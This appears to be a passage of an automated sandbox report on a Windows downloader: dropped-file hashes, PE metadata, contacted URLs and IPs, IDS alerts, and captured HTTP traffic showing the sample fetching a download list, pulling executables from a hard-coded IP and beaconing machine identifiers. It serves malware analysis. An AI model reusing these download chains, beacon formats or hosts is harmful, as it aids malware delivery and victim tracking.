72da805e0e74f4639c1808055179ea18 c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\src2011[1].exe
03df72aee6f6356ea0b59302f76e3d6e c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\1819[1].exe
ff3313ae059f35c64b811847f361755c c:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fe2c\jyrili.exe
2b1f60b4aa2e7985933fc443d7f1a4ec c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RIBridage.exe
14ed061e194da38b934a5fd0711649d1 c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.dll
dec05826e9eaf249432f411092581560 c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView64.dll
2ceac8df5e707d11cc7d9b4039820076 c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\chromeNativeClient\chromerl.exe
5dbafb8fef44cc425f3d7d365a0b11d7 c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\fixfunction.dll
e82589352ae7cda604e8bad9d7bf7e3a c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\guide.exe
2d088118d23afb88ad77bdfd285a5c4b c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\istask.dll
ff3313ae059f35c64b811847f361755c c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyrili.exe
902d8c82ebff36c3378697a0752f4c64 c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyueservice.exe
8bef94f713ed5a9ffa738d7fe0522f5d c:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jywebHelper.dll
b639392811eb3f2340c4a2e069ec02eb c:\Windows\WindowsUpdate\otqvyruekg.exe
7cbfeaf236632c24c6806713e16d0ad4 c:\Windows\mm.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\pcq.exe
72da805e0e74f4639c1808055179ea18 c:\Windows\src2011.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\27e.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\BPp.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\Dqc.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\G57.exe
db2f4e853e6e1c5e69da92a8bf69f1b2 c:\Windows\tAzJsX\LiveUDHelper.dll
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\MIJ.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\PTR.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\bFuAq.exe
50c7ce0fefbde011dc55fe84059b7547 c:\Windows\tAzJsX\drH.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 426462 430080 4.52617 34e1914c276d50c06f54370c7f58ecaf
.rdata 434176 2970308 2973696 4.33103 ef567c17d1699e5a2e118074589dbd45
.data 3407872 199658 61440 3.30411 a2844bbf7b3d0cfbb97dac48907e619c
.rsrc 3608576 23796 24576 3.48449 95a04cdb919fdc8d64a930ed5d5251b7

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://yd.ecoma.ourwebpic.com/ip2city.asp
hxxp://city.ip138.com/ip2city.asp 125.77.197.86
hxxp://yd.ecoma.ourwebpic.com/ips.asp?ip=194.242.96.218&action=2
hxxp://city.ip138.com/ips.htm?ip=194.242.96.218&action=2 125.77.197.86
hxxp://e11290.dspg.akamaiedge.net/fwlink?linkid=30219&locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2
hxxp://183.60.200.160/yy.txt
hxxp://movie.metaservices.windowsmedia.com.akadns.net/locater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2
hxxp://183.60.200.160/1819.exe
hxxp://gpla1.wac.v2cdn.net/CRL/Omniroot2025.crl
hxxp://hostedocsp.globalsign.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAqF15UlAVwhXc+YAAQACoXU=
hxxp://www.900cpa.cc/tongji.php?ver=hongchen&mac=00:50:56:3C:AC:71&pid=2748&did=-1289677981&mid=axac 211.149.219.119
hxxp://dl.jyrili.com.w.kunlunar.com/download/src2011.exe 27.221.30.109
hxxp://www.jyrili.com/client.do/?method=configex&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 121.42.212.184
hxxp://www.jyrili.com/client.do/?method=bm&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 121.42.212.184
hxxp://a1363.dscg.akamai.net/pki/crl/products/MicCodSigPCA_08-31-2010.crl
hxxp://www.jyrili.com/client.do/?method=cupdate&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 121.42.212.184
hxxp://www.jyrili.com/client.do/?&method=install&n=91&_b=None_440BX Desktop Reference Platform&_c=GenuineIntel_Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz_0FEBFBFF000306C3&_d=&_m=0050563CAC71&source=2011&uuid=8f8c470902831287fd8ff759df1090d8&version=4.0.3.0&sign=867066c5a4eecb5dbdb0b359b7cc2ac0&os=3&app_name= 121.42.212.184
hxxp://www.jyrili.com/client.do/?method=uiconfig2&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8&type=0 121.42.212.184
hxxp://dl.jyrili.com.w.kunlunar.com/download/cupdate/cupdate.dat 27.221.30.109
hxxp://a1158.b.akamai.net/MFUwUzBRME8wTTAJBgUrDgMCGgUABBTkLVLomfJQOu5CFIgPOR73ljBRHAQU+L36r3N3xscb+UtNEafRM6+vchECFEOZrYpYgDwxeWGj/HetMtWiXvU/
hxxp://dl.jyrili.com/download/cupdate/cupdate.dat 27.221.30.109
hxxp://www.ip138.com/ips.asp?ip=194.242.96.218&action=2 87.245.198.83
hxxp://dl.jyrili.com/download/src2011.exe 27.221.30.109
hxxp://movie.metaservices.microsoft.com/locater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2 65.55.186.113
hxxp://183.60.200.160:8080/yy.txt
hxxp://www.900cpa.cc:8080/tongji.php?ver=hongchen&mac=00:50:56:3C:AC:71&pid=2748&did=-1289677981&mid=axac 211.149.219.119
hxxp://cdp1.public-trust.com/CRL/Omniroot2025.crl 93.184.220.20
hxxp://go.microsoft.com/fwlink?linkid=30219&locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2 96.6.15.244
hxxp://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAqF15UlAVwhXc+YAAQACoXU= 198.41.214.186
hxxp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl 212.30.134.169
hxxp://183.60.200.160:8080/1819.exe
hxxp://vassg142.ocsp.omniroot.com/MFUwUzBRME8wTTAJBgUrDgMCGgUABBTkLVLomfJQOu5CFIgPOR73ljBRHAQU+L36r3N3xscb+UtNEafRM6+vchECFEOZrYpYgDwxeWGj/HetMtWiXvU/ 2.21.89.26
hxxp://www.ip138.com/ip2city.asp 87.245.198.83
games.metaservices.microsoft.com 65.55.162.26
down.818wy.com 42.236.91.198
88.200jh.com 50.117.89.77


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Internal Host Getting External IP Address - ip2city.asp
ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /ips.asp?ip=194.242.96.218&action=2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.ip138.com
Cache-Control: no-cache


HTTP/1.0 302 Moved Temporarily
Server: Cdn Cache Server V2.0
Date: Mon, 09 Jan 2017 19:55:31 GMT
Content-Length: 0
Location: hXXp://city.ip138.com/ips.htm?ip=194.242.96.218&action=2


GET /ips.asp?ip=194.242.96.218&action=2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.ip138.com
Cache-Control: no-cache


HTTP/1.0 302 Moved Temporarily
Server: Cdn Cache Server V2.0
Date: Mon, 09 Jan 2017 19:56:20 GMT
Content-Length: 0
Location: hXXp://city.ip138.com/ips.htm?ip=194.242.96.218&action=2


GET /client.do/?method=configex&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
91..{"code":"00000","data":"hXXp://dl.jyrili.com/download/extenconfig/
exconfig.dat","desc":"succ","flag":"0","id":"hohonaplgfolmdaaafoddgbia
kognoal"}..0..HTTP/1.1 200 OK..Server: nginx/1.4.4..Date: Mon, 09 Jan
2017 19:56:21 GMT..Content-Type: text/html..Transfer-Encoding: chunked
..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: PHP/5.5
.7..91..{"code":"00000","data":"hXXp://dl.jyrili.com/download/extencon
fig/exconfig.dat","desc":"succ","flag":"0","id":"hohonaplgfolmdaaafodd
gbiakognoal"}..0..
....



GET /client.do/?method=bm&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 HTTP/1.1

Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
570..{"code":"00000","data":"E1JQEgdfFBZFIgU0C00aXUQnGHJ1XTpJRRIcH0RBa
AcUVmkfcURqTRcVEngBHxNNVTBdA0gPbHw0Z0ETCUgeRUMfFBkEBkhLR1NuBCUPHhVbQ0A
WA0NHYB9HAVYSf0o9Wx4CA14QUQtVKy0eEQ0EbCZdfx1COhMYSkEGKwJtGEEAFxxxCSxNO
wgCSAtRC1VGelRbQxdEMhovTAYzFEFRSRMAAC8HFVlcVCZGK0YfREoPFxZCAyIqRVUCF1g
nHDgTLkk6AgQERlkfOUZGCgYeMAcldV1ZEkNOSgNDT2gYQw9qWDIHF1kVREoPBgFdExIrS
lUCF2wmX34eFzoTGBYSBysCbExHCGlFZw14Sy4TAEtDEG0CQz4fR2RABTBbeXUHUVFIRi9
ETkdtGlUUF1E3DAFHFgMeD0lRA1UKdFJVTFRCNA08fAAKRBdRBEYAWTBIGAkHA30LJ0RQS
kRJFgBFIgU0C00aXUQnGHJ1XTpJWgQEHx8WNxhFCxtTPAUUBk0SCBBKQQVPR2kdQGddUTw
3OE5QSkRYAR9VEgQ7C00aXVE8WXoaLToTGRZDUCsCb09CCWlFZw0rTC4TXksXSm0CTmlKF
GRABTVYeHUHU19OEVEdVRY8TT5WUVUrSnILRkQbAQhRRRYFP0wDbUdccVJqXgURSB9ARwR
ZFDdEVRQXVDYbPHwACkQXURtFAwdidVhkGkckH2YbQVJTAxAcXCtYZ0JPDQcCZlhxHVBKR
FgBH1USBDsLTRoHA2ddFFxFAFMcLwYEQENodQINV1YwND0RQFQHAC8GBBFHaHUCDQcBMTQ
9HRdUAnEGRgcREwRcT15WBw8dfx9FAzpYRhYGQystHENbBGwmX3odEURKDxIXVT4ZPEwPG
g8SZUo1BQlEEkwBFFQDIipFVQIXRyQfZl0TCQRMHF1SGBp6BVVcUEMnPTpFUFxERQcHQU0
rd3VYWVweJwknSxMJSE4cHm1YSChAEwVYXQxRcRpLUVMdQiwAR0ZhHUMJAW9gW3EaRlVUH
FFfEwIFNE0SS1YSaUoUXEQCAhUvBgQVTjx1Ag9TBWJFFFxEAgIVU1IRKwJuG0YJaUVmXXF
KLhNQT0FBE1tVOU0TcVtUNhBqE1BeRFBfCBMDFipOEkxgQj9KcgsFEREDBx5QGxt2ShhVF
xxxDC1aBjMUQVFJEx8DLFlNZBpsfAkhBwYHCU8SHB8UGDV1WAdFWTdVJUQtX18eSkQER0Y
HGEcJDARnWXx2QVVfHkdAA0ZVdAsCSllUNhsrC0hEOlhGEAAWKy0cTgoMbCZfexsQOhNLF
UNSKwJtSkQJaUVmUXlPLhNSSEtFE1tVOU0TcVtUNhBqE1BfRFAu","desc":"succ"}..0
..
....

<<< skipped >>>

GET /client.do/?&method=install&n=91&_b=None_440BX Desktop Reference Platform&_c=GenuineIntel_Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz_0FEBFBFF000306C3&_d=&_m=0050563CAC71&source=2011&uuid=8f8c470902831287fd8ff759df1090d8&version=4.0.3.0&sign=867066c5a4eecb5dbdb0b359b7cc2ac0&os=3&app_name= HTTP/1.1

Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
2a..{"code":"00000","data":null,"desc":"succ"}..0......



GET /client.do/?method=uiconfig2&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8&type=0 HTTP/1.1

Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
2a..{"code":"00000","data":null,"desc":"succ"}..0......



GET /client.do/?method=cupdate&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 HTTP/1.1

Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
97..{"code":"00000","data":"{version=2.0.4.0&url=hXXp://dl.jyrili.com/
download/cupdate/cupdate.dat}","desc":"succ","id":"hohonaplgfolmdaaafo
ddgbiakognoal"}..0..HTTP/1.1 200 OK..Server: nginx/1.4.4..Date: Mon, 0
9 Jan 2017 19:56:26 GMT..Content-Type: text/html..Transfer-Encoding: c
hunked..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: P
HP/5.5.7..97..{"code":"00000","data":"{version=2.0.4.0&url=hXXp://dl.j
yrili.com/download/cupdate/cupdate.dat}","desc":"succ","id":"hohonaplg
folmdaaafoddgbiakognoal"}..0..


GET /ip2city.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.ip138.com
Cache-Control: no-cache


HTTP/1.0 302 Moved Temporarily
Server: Cdn Cache Server V2.0
Date: Mon, 09 Jan 2017 19:55:56 GMT
Content-Length: 0
Location: hXXp://city.ip138.com/ip2city.asp


GET /client.do/?method=configex&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
91..{"code":"00000","data":"hXXp://dl.jyrili.com/download/extenconfig/
exconfig.dat","desc":"succ","flag":"0","id":"hohonaplgfolmdaaafoddgbia
kognoal"}..0..HTTP/1.1 200 OK..Server: nginx/1.4.4..Date: Mon, 09 Jan
2017 19:56:24 GMT..Content-Type: text/html..Transfer-Encoding: chunked
..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: PHP/5.5
.7..91..{"code":"00000","data":"hXXp://dl.jyrili.com/download/extencon
fig/exconfig.dat","desc":"succ","flag":"0","id":"hohonaplgfolmdaaafodd
gbiakognoal"}..0..
....



GET /client.do/?method=bm&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 HTTP/1.1

Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
570..{"code":"00000","data":"E1JQEgdfFBZFIgU0C00aXUQnGHJ1XTpJRRIcH0RBa
AcUVmkfcURqTRcVEngBHxNNVTBdA0gPbHw0Z0ETCUgeRUMfFBkEBkhLR1NuBCUPHhVbQ0A
WA0NHYB9HAVYSf0o9Wx4CA14QUQtVKy0eEQ0EbCZdfx1COhMYSkEGKwJtGEEAFxxxCSxNO
wgCSAtRC1VGelRbQxdEMhovTAYzFEFRSRMAAC8HFVlcVCZGK0YfREoPFxZCAyIqRVUCF1g
nHDgTLkk6AgQERlkfOUZGCgYeMAcldV1ZEkNOSgNDT2gYQw9qWDIHF1kVREoPBgFdExIrS
lUCF2wmX34eFzoTGBYSBysCbExHCGlFZw14Sy4TAEtDEG0CQz4fR2RABTBbeXUHUVFIRi9
ETkdtGlUUF1E3DAFHFgMeD0lRA1UKdFJVTFRCNA08fAAKRBdRBEYAWTBIGAkHA30LJ0RQS
kRJFgBFIgU0C00aXUQnGHJ1XTpJWgQEHx8WNxhFCxtTPAUUBk0SCBBKQQVPR2kdQGddUTw
3OE5QSkRYAR9VEgQ7C00aXVE8WXoaLToTGRZDUCsCb09CCWlFZw0rTC4TXksXSm0CTmlKF
GRABTVYeHUHU19OEVEdVRY8TT5WUVUrSnILRkQbAQhRRRYFP0wDbUdccVJqXgURSB9ARwR
ZFDdEVRQXVDYbPHwACkQXURtFAwdidVhkGkckH2YbQVJTAxAcXCtYZ0JPDQcCZlhxHVBKR
FgBH1USBDsLTRoHA2ddFFxFAFMcLwYEQENodQINV1YwND0RQFQHAC8GBBFHaHUCDQcBMTQ
9HRdUAnEGRgcREwRcT15WBw8dfx9FAzpYRhYGQystHENbBGwmX3odEURKDxIXVT4ZPEwPG
g8SZUo1BQlEEkwBFFQDIipFVQIXRyQfZl0TCQRMHF1SGBp6BVVcUEMnPTpFUFxERQcHQU0
rd3VYWVweJwknSxMJSE4cHm1YSChAEwVYXQxRcRpLUVMdQiwAR0ZhHUMJAW9gW3EaRlVUH
FFfEwIFNE0SS1YSaUoUXEQCAhUvBgQVTjx1Ag9TBWJFFFxEAgIVU1IRKwJuG0YJaUVmXXF
KLhNQT0FBE1tVOU0TcVtUNhBqE1BeRFBfCBMDFipOEkxgQj9KcgsFEREDBx5QGxt2ShhVF
xxxDC1aBjMUQVFJEx8DLFlNZBpsfAkhBwYHCU8SHB8UGDV1WAdFWTdVJUQtX18eSkQER0Y
HGEcJDARnWXx2QVVfHkdAA0ZVdAsCSllUNhsrC0hEOlhGEAAWKy0cTgoMbCZfexsQOhNLF
UNSKwJtSkQJaUVmUXlPLhNSSEtFE1tVOU0TcVtUNhBqE1BfRFAu","desc":"succ"}..0
..
....

<<< skipped >>>

GET /client.do/?method=cupdate&version=4.0.3.0&source=2011&uuid=8f8c470902831287fd8ff759df1090d8 HTTP/1.1

Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: VVV.jyrili.com


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Mon, 09 Jan 2017 19:56:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.7
97..{"code":"00000","data":"{version=2.0.4.0&url=hXXp://dl.jyrili.com/
download/cupdate/cupdate.dat}","desc":"succ","id":"hohonaplgfolmdaaafo
ddgbiakognoal"}..0..HTTP/1.1 200 OK..Server: nginx/1.4.4..Date: Mon, 0
9 Jan 2017 19:56:25 GMT..Content-Type: text/html..Transfer-Encoding: c
hunked..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: P
HP/5.5.7..97..{"code":"00000","data":"{version=2.0.4.0&url=hXXp://dl.j
yrili.com/download/cupdate/cupdate.dat}","desc":"succ","id":"hohonaplg
folmdaaafoddgbiakognoal"}..0..


GET /yy.txt HTTP/1.1
Accept: */*
Referer: hXXp://183.60.200.160:8080/yy.txt
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 183.60.200.160:8080
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 301
Content-Type: text/plain
Last-Modified: Mon, 09 Jan 2017 09:00:28 GMT
Accept-Ranges: bytes
ETag: "841fc7d2566ad21:7fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 Jan 2017 19:55:36 GMT
<project>..<url>hXXp://183.60.200.160:8080/1819.exe</ur
l>..<parameter></parameter>..</project>..<proj
ect>..<url>hXXp://dl.jyrili.com/download/src2011.exe</url&
gt;..<parameter></parameter>..</project>..<projec
t>..<url>hXXp://down.818wy.com:8089/hyaz2_Y_10031.exe</url
>..<parameter></parameter>..</project>
....



GET /1819.exe HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer: hXXp://183.60.200.160:8080/1819.exe
Content-Type: application/x-www-form-urlencoded
Host: 183.60.200.160:8080
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 1314816
Content-Type: application/octet-stream
Last-Modified: Thu, 06 Oct 2016 16:07:20 GMT
Accept-Ranges: bytes
ETag: "4fe773b7eb1fd21:7fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 Jan 2017 19:55:36 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.............b...b.
..b...n...b...i...b...h...b.;.l...b...q...b...q...b...c.&.b.;.?...b...
i...b...h.{.b.P.i...b...b...b...d...b.Rich..b.........PE..L....u.W....
.................0....................@..........................0....
.......................................... ........... ...............
......................................................................
.......................text............................... ..`.rdata..
............................@..@.data...J-..........................@.
...rsrc... ........ ..................@..@............................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................

<<< skipped >>>

GET /ip2city.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.ip138.com
Cache-Control: no-cache


HTTP/1.0 302 Moved Temporarily
Server: Cdn Cache Server V2.0
Date: Mon, 09 Jan 2017 19:55:30 GMT
Content-Length: 0
Location: hXXp://city.ip138.com/ip2city.asp


GET /download/cupdate/cupdate.dat HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: dl.jyrili.com


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 45909
Connection: keep-alive
Date: Mon, 09 Jan 2017 18:20:11 GMT
Last-Modified: Wed, 30 Nov 2016 02:34:39 GMT
ETag: "583e3abf-b355"
Accept-Ranges: bytes
Via: cache7.l2nu17[0,304-0,H], cache10.l2nu17[0,0], kunlun4.cn345[0,200-0,H], kunlun10.cn345[1,0]
Age: 5780
X-Cache: HIT TCP_MEM_HIT dirn:8:233989399
X-Swift-SaveTime: Mon, 09 Jan 2017 19:07:22 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 1bdd1e0a14839917912854923e
7z..'.....;.........$........J...yh..]......J...@....=.N...;.<...h{
2.!.H:)...@...w.....D!QB...H4v.".^...Sg.....jm.R@..t....5Y.XJj..vyjN..
.O..k.E.".......#....c..kWZ.....8.E..5.. ^.z.n.l2.}.G.8....|",."B...${
Z..S...I...u..:}~..$f.$..4..m..... Aki...e...B....h..;3....v....j7ux..
..E.7|G...Xi..\..].d?n/@.....P... c.0....].N.564.$.../...`...\.(....P.
"...........d...)..H............#..b...~c....VO.v.Fe.D.9..4...........
..xJ............Ll...K..?V ../..h.C.u....g.q.lI1....w..s ..Ji..snO..5.
.&.."C....H.gg......OW)@.i7...........$Mp6:4,"...A'..D5o.....J2 p.h{y.
...)Cm.C~7.\;......c}....*Z .,..#E.T.]5..._SuN<AR?9.`....B..&......
.y.g........J.v.........WS..$*.c..,'..t...-...`..yy..jBF6\>..w.:..|
.qA..W.... H.....,.......Cr.jSu....p@...Oy*K..&...e.......x}.w..5Z....
.Y85.`"..1U...K?.T. .... ..8;H&Iz....g7|..P5.m9C.....L4."...lG.P_.....
...$.u..mI.f3L....S/j.A@..{...zs.....02..q....a<..i.[......`.......
;........S5...}...... ..w0h...(.....o.<.Fb...N.=n4-..Qd.1.H;E.~oa..
..DI&7.T......G......._....n[..x].ds......Per.. .......^.mU.S....}.S..
hA.:....Z]..#.}.D}.-S..t<.p9..,g-S/....lY...@.c}.D.....A..C.Ln.w...
84..Cbw(T....(.07x...W.,...Z.w2....H5.O|...%.....O.....=3..l.B.u.v...}
.4...2*J.=..y........)...Y.3......`X._A....zK.0. ....!2..W...A.. %...1
S.v(..[.l...dF...s7.j4...%0..oO.W?I4R....3..^F'l ]r....m6...-q..LS....
H`_.....45M...[K.!...K.<..0[R.co........1E......O..h..y.4.....qNm..
..-.l..n4uey........7.jv....a......>....{".B1.!.\2.}...6..V-.K.F.vH
..m#....L../W.....:...n.C.. .....3.9....._.c-[(.p.-1V.......f.y)J.

<<< skipped >>>

GET /download/cupdate/cupdate.dat HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: dl.jyrili.com


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 45909
Connection: keep-alive
Date: Mon, 09 Jan 2017 18:20:11 GMT
Last-Modified: Wed, 30 Nov 2016 02:34:39 GMT
ETag: "583e3abf-b355"
Accept-Ranges: bytes
Via: cache7.l2nu17[0,304-0,H], cache10.l2nu17[0,0], kunlun4.cn345[0,200-0,H], kunlun7.cn345[1,0]
Age: 5776
X-Cache: HIT TCP_MEM_HIT dirn:8:233989399
X-Swift-SaveTime: Mon, 09 Jan 2017 19:07:22 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 1bdd1e0714839917873651029e
7z..'.....;.........$........J...yh..]......J...@....=.N...;.<...h{
2.!.H:)...@...w.....D!QB...H4v.".^...Sg.....jm.R@..t....5Y.XJj..vyjN..
.O..k.E.".......#....c..kWZ.....8.E..5.. ^.z.n.l2.}.G.8....|",."B...${
Z..S...I...u..:}~..$f.$..4..m..... Aki...e...B....h..;3....v....j7ux..
